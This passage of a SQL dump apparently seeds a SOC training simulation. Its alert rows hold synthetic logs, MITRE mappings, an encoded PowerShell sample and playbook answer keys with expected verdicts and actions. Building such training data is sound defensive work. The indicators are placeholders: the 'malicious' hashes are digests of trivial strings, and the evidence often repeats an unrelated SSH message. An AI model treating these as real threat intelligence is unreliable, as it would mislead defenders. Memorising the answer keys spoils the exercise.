Password\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.545Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:11Z\\\",\\\"event_id\\\":\\\"1001\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"action\\\":\\\"login_attempt\\\",\\\"status\\\":\\\"failed\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\\\",\\\"email_subject\\\":\\\"Urgent: Update Your Password\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(877, 'Unauthorized Use of Admin Tools', 'high', 'Internal Monitoring Systems', 'An attacker with compromised credentials exploited internal admin tools to manipulate account settings of high-profile Twitter users.', 'Execution', 'T1059: Command and Scripting Interpreter', 1, 'new', NULL, '{\"timestamp\":\"2023-10-01T14:23:45Z\",\"event_id\":\"EVT00012345\",\"source_ip\":\"45.76.78.90\",\"internal_ip\":\"10.1.1.15\",\"username\":\"compromised_admin\",\"actions\":[{\"tool\":\"TwitterAdminTool.exe\",\"action\":\"modify_account_settings\",\"target_account\":\"high_profile_user\",\"timestamp\":\"2023-10-01T14:24:10Z\"}],\"hash\":\"5d41402abc4b2a76b9719d911017c592\",\"filename\":\"TwitterAdminTool.exe\",\"activity\":\"Unauthorized manipulation of account settings\"}', '2026-01-15 00:55:54', '2026-02-14 17:06:55', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"45.76.78.90\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelService\",\"verdict\":\"malicious\",\"details\":\"Identified as a command and control server IP.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"InternalNetworkMonitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected host.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"compromised_admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"UserBehaviorAnalytics\",\"verdict\":\"suspicious\",\"details\":\"Account behavior indicates potential compromise.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"MalwareDatabase\",\"verdict\":\"malicious\",\"details\":\"Known hash associated with malware used for credential theft.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"TwitterAdminTool.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"SecuritySoftware\",\"verdict\":\"suspicious\",\"details\":\"File used to execute unauthorized actions on admin accounts.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'EDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.547Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:23:45Z\\\",\\\"event_id\\\":\\\"EVT00012345\\\",\\\"source_ip\\\":\\\"45.76.78.90\\\",\\\"internal_ip\\\":\\\"10.1.1.15\\\",\\\"username\\\":\\\"compromised_admin\\\",\\\"actions\\\":[{\\\"tool\\\":\\\"TwitterAdminTool.exe\\\",\\\"action\\\":\\\"modify_account_settings\\\",\\\"target_account\\\":\\\"high_profile_user\\\",\\\"timestamp\\\":\\\"2023-10-01T14:24:10Z\\\"}],\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"TwitterAdminTool.exe\\\",\\\"activity\\\":\\\"Unauthorized manipulation of account settings\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.547Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:23:45Z\\\",\\\"event_id\\\":\\\"EVT00012345\\\",\\\"source_ip\\\":\\\"45.76.78.90\\\",\\\"internal_ip\\\":\\\"10.1.1.15\\\",\\\"username\\\":\\\"compromised_admin\\\",\\\"actions\\\":[{\\\"tool\\\":\\\"TwitterAdminTool.exe\\\",\\\"action\\\":\\\"modify_account_settings\\\",\\\"target_account\\\":\\\"high_profile_user\\\",\\\"timestamp\\\":\\\"2023-10-01T14:24:10Z\\\"}],\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"TwitterAdminTool.exe\\\",\\\"activity\\\":\\\"Unauthorized manipulation of account settings\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.547Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:23:45Z\\\",\\\"event_id\\\":\\\"EVT00012345\\\",\\\"source_ip\\\":\\\"45.76.78.90\\\",\\\"internal_ip\\\":\\\"10.1.1.15\\\",\\\"username\\\":\\\"compromised_admin\\\",\\\"actions\\\":[{\\\"tool\\\":\\\"TwitterAdminTool.exe\\\",\\\"action\\\":\\\"modify_account_settings\\\",\\\"target_account\\\":\\\"high_profile_user\\\",\\\"timestamp\\\":\\\"2023-10-01T14:24:10Z\\\"}],\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"TwitterAdminTool.exe\\\",\\\"activity\\\":\\\"Unauthorized manipulation of account settings\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.547Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:23:45Z\\\",\\\"event_id\\\":\\\"EVT00012345\\\",\\\"source_ip\\\":\\\"45.76.78.90\\\",\\\"internal_ip\\\":\\\"10.1.1.15\\\",\\\"username\\\":\\\"compromised_admin\\\",\\\"actions\\\":[{\\\"tool\\\":\\\"TwitterAdminTool.exe\\\",\\\"action\\\":\\\"modify_account_settings\\\",\\\"target_account\\\":\\\"high_profile_user\\\",\\\"timestamp\\\":\\\"2023-10-01T14:24:10Z\\\"}],\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"TwitterAdminTool.exe\\\",\\\"activity\\\":\\\"Unauthorized manipulation of account settings\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.547Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:23:45Z\\\",\\\"event_id\\\":\\\"EVT00012345\\\",\\\"source_ip\\\":\\\"45.76.78.90\\\",\\\"internal_ip\\\":\\\"10.1.1.15\\\",\\\"username\\\":\\\"compromised_admin\\\",\\\"actions\\\":[{\\\"tool\\\":\\\"TwitterAdminTool.exe\\\",\\\"action\\\":\\\"modify_account_settings\\\",\\\"target_account\\\":\\\"high_profile_user\\\",\\\"timestamp\\\":\\\"2023-10-01T14:24:10Z\\\"}],\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"TwitterAdminTool.exe\\\",\\\"activity\\\":\\\"Unauthorized manipulation of account settings\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(878, 'Creation of Persistent Access Channels', 'high', 'Endpoint Detection and Response', 'The attacker has established backdoor access to ensure persistent access to the compromised accounts, allowing them to return even if initial credentials are revoked.', 'Persistence', 'T1547', 1, 'new', NULL, '{\"timestamp\":\"2023-10-04T14:22:08Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.15\",\"username\":\"jdoe\",\"filename\":\"backdoor.exe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"event_type\":\"Execution\",\"event_description\":\"Suspicious binary executed with the objective of maintaining persistent access.\",\"process_id\":\"5720\",\"process_name\":\"backdoor.exe\",\"destination\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\backdoor.exe\"}', '2026-01-15 00:55:54', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known IP address associated with multiple cyber attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"backdoor.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Detection\",\"verdict\":\"malicious\",\"details\":\"Backdoor executable known to maintain persistent access.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash associated with malicious activity.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"User account potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(879, 'Cryptocurrency Transfer Activity', 'high', 'Blockchain Analysis Tools', 'The attacker posted fraudulent messages from compromised accounts, directing followers to a Bitcoin wallet and successfully stealing $120,000 before detection.', 'Exfiltration', 'T1567 - Exfiltration Over Web Service', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:56:32Z\",\"event_id\":\"evt-crypto-004\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.101\",\"source_user\":\"compromised_user_01\",\"transaction_id\":\"tx1234567890\",\"bitcoin_wallet\":\"1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa\",\"amount_usd\":120000,\"malicious_url\":\"http://malicious-site.com/bitcoin-scam\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"filename\":\"scam_guide.pdf\"}', '2026-01-15 00:55:54', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"IP Reputation Service\",\"verdict\":\"malicious\",\"details\":\"IP address associated with multiple fraudulent activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"compromised_user_01\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"suspicious\",\"details\":\"User account compromised in phishing attack.\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"http://malicious-site.com/bitcoin-scam\",\"is_critical\":true,\"osint_result\":{\"source\":\"URL Analysis Service\",\"verdict\":\"malicious\",\"details\":\"URL hosting Bitcoin scam content.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Analysis Service\",\"verdict\":\"suspicious\",\"details\":\"PDF file associated with scam instructions.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'DLP', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.549Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:56:32Z\\\",\\\"event_id\\\":\\\"evt-crypto-004\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.101\\\",\\\"source_user\\\":\\\"compromised_user_01\\\",\\\"transaction_id\\\":\\\"tx1234567890\\\",\\\"bitcoin_wallet\\\":\\\"1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa\\\",\\\"amount_usd\\\":120000,\\\"malicious_url\\\":\\\"http://malicious-site.com/bitcoin-scam\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"scam_guide.pdf\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.549Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:56:32Z\\\",\\\"event_id\\\":\\\"evt-crypto-004\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.101\\\",\\\"source_user\\\":\\\"compromised_user_01\\\",\\\"transaction_id\\\":\\\"tx1234567890\\\",\\\"bitcoin_wallet\\\":\\\"1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa\\\",\\\"amount_usd\\\":120000,\\\"malicious_url\\\":\\\"http://malicious-site.com/bitcoin-scam\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"scam_guide.pdf\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.549Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:56:32Z\\\",\\\"event_id\\\":\\\"evt-crypto-004\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.101\\\",\\\"source_user\\\":\\\"compromised_user_01\\\",\\\"transaction_id\\\":\\\"tx1234567890\\\",\\\"bitcoin_wallet\\\":\\\"1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa\\\",\\\"amount_usd\\\":120000,\\\"malicious_url\\\":\\\"http://malicious-site.com/bitcoin-scam\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"scam_guide.pdf\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.549Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:56:32Z\\\",\\\"event_id\\\":\\\"evt-crypto-004\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.101\\\",\\\"source_user\\\":\\\"compromised_user_01\\\",\\\"transaction_id\\\":\\\"tx1234567890\\\",\\\"bitcoin_wallet\\\":\\\"1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa\\\",\\\"amount_usd\\\":120000,\\\"malicious_url\\\":\\\"http://malicious-site.com/bitcoin-scam\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"scam_guide.pdf\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.549Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:56:32Z\\\",\\\"event_id\\\":\\\"evt-crypto-004\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.101\\\",\\\"source_user\\\":\\\"compromised_user_01\\\",\\\"transaction_id\\\":\\\"tx1234567890\\\",\\\"bitcoin_wallet\\\":\\\"1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa\\\",\\\"amount_usd\\\":120000,\\\"malicious_url\\\":\\\"http://malicious-site.com/bitcoin-scam\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"scam_guide.pdf\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(880, 'Unauthorized Certificate Access Detected', 'high', 'Security Information and Event Management (SIEM)', 'An unauthorized access attempt was detected using a compromised certificate. APT29 is leveraging a stolen Mimecast certificate to gain initial access to Microsoft 365 environments, indicative of a supply chain attack vector.', 'Supply Chain Attack', 'T1195: Supply Chain Compromise', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:07Z\",\"event_id\":\"evt-20231015-001\",\"source_ip\":\"185.100.87.202\",\"destination_ip\":\"192.168.1.10\",\"certificate_serial\":\"04:92:48:7D:3A:5B:9C:1E:AC:91\",\"malware_hash\":\"e99a18c428cb38d5f260853678922e03\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\",\"filename\":\"MimecastCert.pfx\",\"username\":\"j.doe@company.com\",\"event_type\":\"certificate_access\",\"log_message\":\"Unauthorized certificate access detected from IP 185.100.87.202 using compromised certificate to 192.168.1.10\"}', '2026-01-15 00:56:34', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.100.87.202\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT29 activities\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal server IP\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with certificate theft\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"MimecastCert.pfx\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Reputation Service\",\"verdict\":\"suspicious\",\"details\":\"Filename linked to unauthorized access attempts\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"j.doe@company.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"Employee account potentially compromised\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.551Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:07Z\\\",\\\"event_id\\\":\\\"evt-20231015-001\\\",\\\"source_ip\\\":\\\"185.100.87.202\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"certificate_serial\\\":\\\"04:92:48:7D:3A:5B:9C:1E:AC:91\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\\\",\\\"filename\\\":\\\"MimecastCert.pfx\\\",\\\"username\\\":\\\"j.doe@company.com\\\",\\\"event_type\\\":\\\"certificate_access\\\",\\\"log_message\\\":\\\"Unauthorized certificate access detected from IP 185.100.87.202 using compromised certificate to 192.168.1.10\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.551Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:07Z\\\",\\\"event_id\\\":\\\"evt-20231015-001\\\",\\\"source_ip\\\":\\\"185.100.87.202\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"certificate_serial\\\":\\\"04:92:48:7D:3A:5B:9C:1E:AC:91\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\\\",\\\"filename\\\":\\\"MimecastCert.pfx\\\",\\\"username\\\":\\\"j.doe@company.com\\\",\\\"event_type\\\":\\\"certificate_access\\\",\\\"log_message\\\":\\\"Unauthorized certificate access detected from IP 185.100.87.202 using compromised certificate to 192.168.1.10\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.551Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:07Z\\\",\\\"event_id\\\":\\\"evt-20231015-001\\\",\\\"source_ip\\\":\\\"185.100.87.202\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"certificate_serial\\\":\\\"04:92:48:7D:3A:5B:9C:1E:AC:91\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\\\",\\\"filename\\\":\\\"MimecastCert.pfx\\\",\\\"username\\\":\\\"j.doe@company.com\\\",\\\"event_type\\\":\\\"certificate_access\\\",\\\"log_message\\\":\\\"Unauthorized certificate access detected from IP 185.100.87.202 using compromised certificate to 192.168.1.10\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.551Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:07Z\\\",\\\"event_id\\\":\\\"evt-20231015-001\\\",\\\"source_ip\\\":\\\"185.100.87.202\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"certificate_serial\\\":\\\"04:92:48:7D:3A:5B:9C:1E:AC:91\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\\\",\\\"filename\\\":\\\"MimecastCert.pfx\\\",\\\"username\\\":\\\"j.doe@company.com\\\",\\\"event_type\\\":\\\"certificate_access\\\",\\\"log_message\\\":\\\"Unauthorized certificate access detected from IP 185.100.87.202 using compromised certificate to 192.168.1.10\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.551Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:07Z\\\",\\\"event_id\\\":\\\"evt-20231015-001\\\",\\\"source_ip\\\":\\\"185.100.87.202\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"certificate_serial\\\":\\\"04:92:48:7D:3A:5B:9C:1E:AC:91\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\\\",\\\"filename\\\":\\\"MimecastCert.pfx\\\",\\\"username\\\":\\\"j.doe@company.com\\\",\\\"event_type\\\":\\\"certificate_access\\\",\\\"log_message\\\":\\\"Unauthorized certificate access detected from IP 185.100.87.202 using compromised certificate to 192.168.1.10\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(881, 'Suspicious OAuth Token Requests', 'high', 'Cloud Access Security Broker (CASB)', 'APT29 has been observed abusing OAuth tokens to escalate privileges within the cloud infrastructure. This activity was detected following an initial access, indicating potential persistence strategies by the threat actor.', 'Cloud Exploitation', 'T1550.001 - Use Alternate Authentication Material: Application Access Token', 1, 'new', NULL, '{\"event_time\":\"2023-10-12T14:32:00Z\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.101\",\"user\":\"jdoe@corp.com\",\"action\":\"OAuth Token Request\",\"service_name\":\"Company Cloud Service\",\"token_id\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"token_status\":\"active\",\"detected_by\":\"CASB\",\"description\":\"OAuth token request from an external IP associated with known APT activity.\",\"related_filename\":\"malicious_payload.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-01-15 00:56:34', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with APT29 activity.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"jdoe@corp.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Corporate user potentially compromised.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known payload.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.552Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 